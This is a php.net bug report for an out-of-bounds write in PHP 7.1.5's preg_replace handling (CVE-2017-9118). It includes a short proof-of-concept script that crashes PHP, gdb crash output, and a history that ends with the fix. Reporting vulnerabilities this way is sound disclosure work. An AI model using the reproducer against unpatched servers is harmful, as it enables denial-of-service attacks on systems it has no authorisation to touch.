php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #74604 Out of bounds in php_pcre_replace_impl
Submitted: 2017-05-17 09:12 UTC Modified: 2021-10-20 12:07 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: whitehat002 at hotmail dot com Assigned: cmb (profile)
Status: Closed Package: PCRE related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: 2017-9118
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: whitehat002 at hotmail dot com
New email:
PHP Version: OS:

 

 [2017-05-17 09:12 UTC] whitehat002 at hotmail dot com
Description:
------------
It seems to be an out of bounds bug.

Test script:
---------------
<?php
ini_set('memory_limit',-1);
$str=str_repeat("A",0x7ffffffe);
preg_replace("/A/i",$str,"AAAAAAAAAAAAAAAAAA");


Expected result:
----------------
no crash 

Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.5/sapi/cli/php -n poc2.php 
Reading symbols from /root/php-7.1.5/sapi/cli/php...done.
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x36dfdfb0 ('A' <repeats 200 times>...)
EBX: 0xb7200000 
ECX: 0x0 
EDX: 0x41 ('A')
ESI: 0x41 ('A')
EDI: 0xb6c0000d --> 0x0 
EBP: 0xbfffbf98 --> 0xb7013100 ('A' <repeats 200 times>...)
ESP: 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
EIP: 0x8106c7d (<php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl)
EFLAGS: 0x210293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8106c75 <php_pcre_replace_impl+933>:	
    jne    0x8106cb8 <php_pcre_replace_impl+1000>
   0x8106c77 <php_pcre_replace_impl+935>:	mov    eax,DWORD PTR [ebp-0x24]
   0x8106c7a <php_pcre_replace_impl+938>:	movzx  edx,BYTE PTR [eax]
=> 0x8106c7d <php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl
   0x8106c7f <php_pcre_replace_impl+943>:	lea    edx,[eax+0x1]
   0x8106c82 <php_pcre_replace_impl+946>:	add    ebx,0x1
   0x8106c85 <php_pcre_replace_impl+949>:	mov    DWORD PTR [ebp-0x24],edx
   0x8106c88 <php_pcre_replace_impl+952>:	movzx  esi,BYTE PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
0004| 0xbfffbe94 --> 0xb7068048 ('A' <repeats 200 times>...)
0008| 0xbfffbe98 --> 0x0 
0012| 0xbfffbe9c --> 0x20 (' ')
0016| 0xbfffbea0 --> 0x0 
0020| 0xbfffbea4 --> 0x0 
0024| 0xbfffbea8 --> 0xbfffbeb0 --> 0x0 
0028| 0xbfffbeac --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
php_pcre_replace_impl (pce=0x8bb1b30, subject_str=0xb7068038, 
    subject=0xb7068048 'A' <repeats 200 times>..., subject_len=0x20, 
    replace_val=0xb7013110, is_callable_replace=0x0, limit=0xffffffff, 
    replace_count=0xbfffc08c) at /root/php-7.1.5/ext/pcre/php_pcre.c:1317
1317						*walkbuf++ = *walk++;
gdb-peda$ x/s $ebx
0xb7200000:	 <Address 0xb7200000 out of bounds>

Patches

Pull Requests

Pull requests:

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-05-23 01:26 UTC] whitehat002 at hotmail dot com
Has anyone responded to this bug?
 [2017-06-20 06:18 UTC] stas@php.net
-Type: Security +Type: Bug
 [2018-08-03 03:35 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2017-9118
 [2018-12-08 11:20 UTC] cmb@php.net
If it's not a security issue, it shouldn't have a CVE.
 [2021-10-20 12:05 UTC] cmb@php.net
The following pull request has been associated:

Patch Name: Fix #74604: Out of bounds in php_pcre_replace_impl
On GitHub:  https://github.com/php/php-src/pull/7597
Patch:      https://github.com/php/php-src/pull/7597.patch
 [2021-10-20 12:07 UTC] cmb@php.net
-Status: Open +Status: Verified -Assigned To: +Assigned To: cmb
 [2021-11-29 18:19 UTC] git@php.net
Automatic comment on behalf of cmb69
Revision: https://github.com/php/php-src/commit/712fc54e856d3d8e80a7d074a2733bc6b3a27e90
Log: Fix #74604: Out of bounds in php_pcre_replace_impl
 [2021-11-29 18:19 UTC] git@php.net
-Status: Verified +Status: Closed
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Oct 08 19:01:28 2024 UTC